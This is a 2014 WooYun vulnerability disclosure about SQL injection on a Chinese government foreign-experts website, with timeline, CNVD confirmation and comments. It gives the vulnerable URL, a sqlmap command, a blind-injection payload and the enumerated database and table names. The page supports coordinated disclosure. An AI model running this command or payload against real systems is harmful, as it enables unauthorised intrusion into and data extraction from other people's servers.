中华人民共和国国家外国专家局SQL注射

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053770

漏洞标题：中华人民共和国国家外国专家局SQL注射

漏洞作者： lxj616

提交时间：2014-03-16 11:05

修复时间：2014-04-30 11:06

公开时间：2014-04-30 11:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-03-16：细节已通知厂商并且等待厂商处理中
2014-03-22：厂商已经确认，细节仅向厂商公开
2014-04-01：细节向核心白帽子及相关领域专家公开
2014-04-11：细节向普通白帽子公开
2014-04-21：细节向实习白帽子公开
2014-04-30：细节向公众公开

简要描述：

中华人民共和国国家外国专家局 SQL注射 SQLMAP 验证
State Administration of Foreign Experts Affairs, the P.R. of China SQLi

详细说明：

漏洞位置：
http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1

注意 level 5 别忘了

C:\Users\Administrator>sqlmap.py -u "http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1" --tables --level 5

sqlmap identified the following injection points with a total of 572 HTTP(s) requests:
---
Place: GET
Parameter: d
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: d=1' RLIKE (SELECT (CASE WHEN (7980=7980) THEN 1 ELSE 0x28 END)) AND 'BJwf'='BJwf
---
web application technology: Apache 2.2.11, PHP 5.3.6
back-end DBMS: MySQL >= 5.0.0
Database: hftp_mysqldb
[16 tables]
+----------------------------------------------+
| acct_info                                    |
| admin_info                                   |
| assign_info                                  |
| catalog_info                                 |
| cv_info                                      |
| cvedu_info                                   |
| cvexp_info                                   |
| empl_info                                    |
| job_info                                     |
| jobapply_info                                |
| jobrecom_info                                |
| key_info                                     |
| menu_info                                    |
| myjoblist_info                               |
| news_info                                    |
| para_info                                    |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: yzbbs_mysqldb
[4 tables]
+----------------------------------------------+
| art_info                                     |
| assign_info                                  |
| col_info                                     |
| top_info                                     |
+----------------------------------------------+
Database: eo_mysqldb
[29 tables]
+----------------------------------------------+
| acct_info                                    |
| admin_info                                   |
| agency_info                                  |
| agent_info                                   |
| assign_info                                  |
| biz_info                                     |
| catalog_info                                 |
| dtrec_info                                   |
| empl_info                                    |
| emplexpert_info                              |
| emplregis_info                               |
| enqu_info                                    |
| expert_info                                  |
| filelog_info                                 |
| key_info                                     |
| menu_info                                    |
| news_info                                    |
| para_info                                    |
| proj_info                                    |
| projexp_info                                 |
| safeauser_info                               |
| tgproj_info                                  |
| tgprojcost_info                              |
| tgprojref_info                               |
| tgprojsbm_info                               |
| yzproj_info                                  |
| yzprojcost_info                              |
| yzprojref_info                               |
| yzprojsbm_info                               |
+----------------------------------------------+
Database: cepms_mysqldb
[21 tables]
+----------------------------------------------+
| acct_info                                    |
| admin_info                                   |
| assign_info                                  |
| attach_info                                  |
| catalog_info                                 |
| ceproj_info                                  |
| chklog_info                                  |
| cont_info                                    |
| cost_info                                    |
| empl_info                                    |
| filelog_info                                 |
| key_info                                     |
| member_info                                  |
| menu_info                                    |
| news_info                                    |
| para_info                                    |
| projexp_info                                 |
| projext_info                                 |
| projlog_info                                 |
| safeauser_info                               |
| schedule_info                                |
+----------------------------------------------+
Database: yzpt_mysqldb
[31 tables]
+----------------------------------------------+
| acct_info                                    |
| admin_info                                   |
| agency_info                                  |
| agent_info                                   |
| assign_info                                  |
| biz_info                                     |
| catalog_info                                 |
| dtrec_info                                   |
| empl_info                                    |
| emplacct_info                                |
| emplexpert_info                              |

仅获取数据表名称，不再继续深入

漏洞证明：

注意 level 5 别忘了

C:\Users\Administrator>sqlmap.py -u "http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1" --tables --level 5

sqlmap identified the following injection points with a total of 572 HTTP(s) requests:
---
Place: GET
Parameter: d
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: d=1' RLIKE (SELECT (CASE WHEN (7980=7980) THEN 1 ELSE 0x28 END)) AND 'BJwf'='BJwf
---
web application technology: Apache 2.2.11, PHP 5.3.6
back-end DBMS: MySQL >= 5.0.0
Database: hftp_mysqldb
[16 tables]
+----------------------------------------------+
| acct_info                                    |
| admin_info                                   |
| assign_info                                  |
| catalog_info                                 |
| cv_info                                      |
| cvedu_info                                   |
| cvexp_info                                   |
| empl_info                                    |
| job_info                                     |
| jobapply_info                                |
| jobrecom_info                                |
| key_info                                     |
| menu_info                                    |
| myjoblist_info                               |
| news_info                                    |
| para_info                                    |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: yzbbs_mysqldb
[4 tables]
+----------------------------------------------+
| art_info                                     |
| assign_info                                  |
| col_info                                     |
| top_info                                     |
+----------------------------------------------+
Database: eo_mysqldb
[29 tables]
+----------------------------------------------+
| acct_info                                    |
| admin_info                                   |
| agency_info                                  |
| agent_info                                   |
| assign_info                                  |
| biz_info                                     |
| catalog_info                                 |
| dtrec_info                                   |
| empl_info                                    |
| emplexpert_info                              |
| emplregis_info                               |
| enqu_info                                    |
| expert_info                                  |
| filelog_info                                 |
| key_info                                     |
| menu_info                                    |
| news_info                                    |
| para_info                                    |
| proj_info                                    |
| projexp_info                                 |
| safeauser_info                               |
| tgproj_info                                  |
| tgprojcost_info                              |
| tgprojref_info                               |
| tgprojsbm_info                               |
| yzproj_info                                  |
| yzprojcost_info                              |
| yzprojref_info                               |
| yzprojsbm_info                               |
+----------------------------------------------+
Database: cepms_mysqldb
[21 tables]
+----------------------------------------------+
| acct_info                                    |
| admin_info                                   |
| assign_info                                  |
| attach_info                                  |
| catalog_info                                 |
| ceproj_info                                  |
| chklog_info                                  |
| cont_info                                    |
| cost_info                                    |
| empl_info                                    |
| filelog_info                                 |
| key_info                                     |
| member_info                                  |
| menu_info                                    |
| news_info                                    |
| para_info                                    |
| projexp_info                                 |
| projext_info                                 |
| projlog_info                                 |
| safeauser_info                               |
| schedule_info                                |
+----------------------------------------------+
Database: yzpt_mysqldb
[31 tables]
+----------------------------------------------+
| acct_info                                    |
| admin_info                                   |
| agency_info                                  |
| agent_info                                   |
| assign_info                                  |
| biz_info                                     |
| catalog_info                                 |
| dtrec_info                                   |
| empl_info                                    |
| emplacct_info                                |
| emplexpert_info                              |

仅获取数据表名称，不再继续深入

修复方案：

过滤得更加彻底一些吧

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-03-22 21:49

厂商回复：

CNVD确认并复现所述情况，转由CNCERT上报给国家某信息安全协调机构，由其后续通报处置。

漏洞评价：

2014-04-13 00:42 | 信通联盟支付(乌云厂商)

开门，顺风快递
2014-04-13 07:06 | lxj616 ( 普通白帽子 | Rank:438 漏洞数:90 | <hohoho>)

@信通联盟支付我的kali装在U盘里，而我的锤子就在抽屉里，桌上还有瓶工业酒精随时准备放火。。。
2014-04-30 13:04 | bitcoin ( 普通白帽子 | Rank:715 漏洞数:218 | 学习是最好的投资！)

@信通联盟支付我的礼物呢？
2014-04-30 14:03 | ieasyi ( 路人 | Rank:3 漏洞数:2 )

我是来看 level 5 的！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053770

漏洞标题：中华人民共和国国家外国专家局SQL注射

相关厂商：safea.gov.cn

漏洞作者： lxj616

提交时间：2014-03-16 11:05

修复时间：2014-04-30 11:06

公开时间：2014-04-30 11:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053770

漏洞标题：中华人民共和国国家外国专家局SQL注射

相关厂商：safea.gov.cn

漏洞作者： lxj616

提交时间：2014-03-16 11:05

修复时间：2014-04-30 11:06

公开时间：2014-04-30 11:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-053770"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：